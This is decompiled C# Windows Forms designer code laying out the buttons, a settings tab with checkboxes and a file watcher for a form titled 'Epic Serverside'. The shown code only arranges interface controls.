this.button30.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button30.Location = new Point(315, 3);
this.button30.Name = "button30";
this.button30.Size = new Size(150, 84);
this.button30.TabIndex = 11;
this.button30.Text = "Cadilac";
this.button30.UseVisualStyleBackColor = true;
this.button30.Click += new EventHandler(this.button30_Click);
this.button29.FlatStyle = FlatStyle.Popup;
this.button29.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button29.Location = new Point(159, 3);
this.button29.Name = "button29";
this.button29.Size = new Size(150, 84);
this.button29.TabIndex = 10;
this.button29.Text = "Dex";
this.button29.UseVisualStyleBackColor = true;
this.button29.Click += new EventHandler(this.button29_Click);
this.button28.FlatStyle = FlatStyle.Popup;
this.button28.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button28.Location = new Point(471, 3);
this.button28.Name = "button28";
this.button28.Size = new Size(150, 84);
this.button28.TabIndex = 9;
this.button28.Text = "Patrick";
this.button28.UseVisualStyleBackColor = true;
this.button28.Click += new EventHandler(this.button28_Click);
this.button27.FlatStyle = FlatStyle.Popup;
this.button27.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button27.Location = new Point(471, 93);
this.button27.Name = "button27";
this.button27.Size = new Size(150, 84);
this.button27.TabIndex = 8;
this.button27.Text = "Audio";
this.button27.UseVisualStyleBackColor = true;
this.button27.Click += new EventHandler(this.button27_Click);
this.button26.FlatStyle = FlatStyle.Popup;
this.button26.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button26.Location = new Point(3, 93);
this.button26.Name = "button26";
this.button26.Size = new Size(150, 84);
this.button26.TabIndex = 7;
this.button26.Text = "Ambush";
this.button26.UseVisualStyleBackColor = true;
this.button26.Click += new EventHandler(this.button26_Click);
this.button25.FlatStyle = FlatStyle.Popup;
this.button25.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button25.Location = new Point(159, 93);
this.button25.Name = "button25";
this.button25.Size = new Size(150, 84);
this.button25.TabIndex = 6;
this.button25.Text = "Btools";
this.button25.UseVisualStyleBackColor = true;
this.button25.Click += new EventHandler(this.button25_Click);
this.button24.FlatStyle = FlatStyle.Popup;
this.button24.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button24.Location = new Point(3, 3);
this.button24.Name = "button24";
this.button24.Size = new Size(150, 84);
this.button24.TabIndex = 5;
this.button24.Text = "Primadon";
this.button24.UseVisualStyleBackColor = true;
this.button24.Click += new EventHandler(this.button24_Click);
this.button13.FlatStyle = FlatStyle.Popup;
this.button13.Font = new Font("Consolas", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.button13.Location = new Point(315, 93);
this.button13.Name = "button13";
this.button13.Size = new Size(150, 84);
this.button13.TabIndex = 3;
this.button13.Text = "Siedge Hammer";
this.button13.UseVisualStyleBackColor = true;
this.button13.Click += new EventHandler(this.button13_Click_1);
this.tabPage5.Controls.Add((Control) this.label3);
this.tabPage5.Controls.Add((Control) this.checkBox2);
this.tabPage5.Controls.Add((Control) this.checkBox1);
this.tabPage5.Controls.Add((Control) this.checkBox4);
this.tabPage5.Controls.Add((Control) this.checkBox3);
this.tabPage5.Location = new Point(4, 22);
this.tabPage5.Name = "tabPage5";
this.tabPage5.Padding = new Padding(3);
this.tabPage5.Size = new Size(644, 385);
this.tabPage5.TabIndex = 5;
this.tabPage5.Text = "Settings";
this.tabPage5.UseVisualStyleBackColor = true;
this.label3.AutoSize = true;
this.label3.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.label3.ForeColor = Color.Black;
this.label3.Location = new Point(101, 53);
this.label3.Name = "label3";
this.label3.Size = new Size(129, 16);
this.label3.TabIndex = 9;
this.label3.Text = "(dark mode soon)";
this.checkBox2.AutoSize = true;
this.checkBox2.Font = new Font("Consolas", 9f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.checkBox2.Location = new Point(6, 54);
this.checkBox2.Name = "checkBox2";
this.checkBox2.Size = new Size(89, 18);
this.checkBox2.TabIndex = 8;
this.checkBox2.Text = "Dark Mode";
this.checkBox2.UseVisualStyleBackColor = true;
this.checkBox1.AutoSize = true;
this.checkBox1.Font = new Font("Consolas", 9f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.checkBox1.Location = new Point(6, 78);
this.checkBox1.Name = "checkBox1";
this.checkBox1.Size = new Size(75, 18);
this.checkBox1.TabIndex = 7;
this.checkBox1.Text = "wersach";
this.checkBox1.UseVisualStyleBackColor = true;
this.checkBox1.CheckedChanged += new
EventHandler(this.checkBox1_CheckedChanged_2);
this.checkBox4.AutoSize = true;
this.checkBox4.Font = new Font("Consolas", 9f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.checkBox4.Location = new Point(6, 30);
this.checkBox4.Name = "checkBox4";
this.checkBox4.Size = new Size(96, 18);
this.checkBox4.TabIndex = 5;
this.checkBox4.Text = "Trancperty";
this.checkBox4.UseVisualStyleBackColor = true;
this.checkBox4.CheckedChanged += new
EventHandler(this.checkBox4_CheckedChanged);
this.checkBox3.AutoSize = true;
this.checkBox3.Font = new Font("Consolas", 9f, FontStyle.Bold,
GraphicsUnit.Point, (byte) 204);
this.checkBox3.Location = new Point(6, 6);
this.checkBox3.Name = "checkBox3";
this.checkBox3.Size = new Size(103, 18);
this.checkBox3.TabIndex = 4;
this.checkBox3.Text = "AlwaysOnTop";
this.checkBox3.UseVisualStyleBackColor = true;
this.checkBox3.CheckedChanged += new
EventHandler(this.checkBox3_CheckedChanged_1);
this.fileSystemWatcher1.EnableRaisingEvents = true;
this.fileSystemWatcher1.SynchronizingObject = (ISynchronizeInvoke) this;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.BackgroundImageLayout = ImageLayout.None;
this.ClientSize = new Size(656, 411);
this.Controls.Add((Control) this.tabControl1);
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Name = nameof (Form1);
this.Text = "Epic Serverside";
this.Load += new EventHandler(this.Form1_Load);
this.tabPage1.ResumeLayout(false);
this.tabPage1.PerformLayout();
((ISupportInitialize) this.richTextBox1).EndInit();
this.tabControl1.ResumeLayout(false);
this.tabPage3.ResumeLayout(false);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.tabPage2.ResumeLayout(false);
this.tabPage5.ResumeLayout(false);
this.tabPage5.PerformLayout();
this.fileSystemWatcher1.EndInit();
this.ResumeLayout(false);
}
}
}

You might also like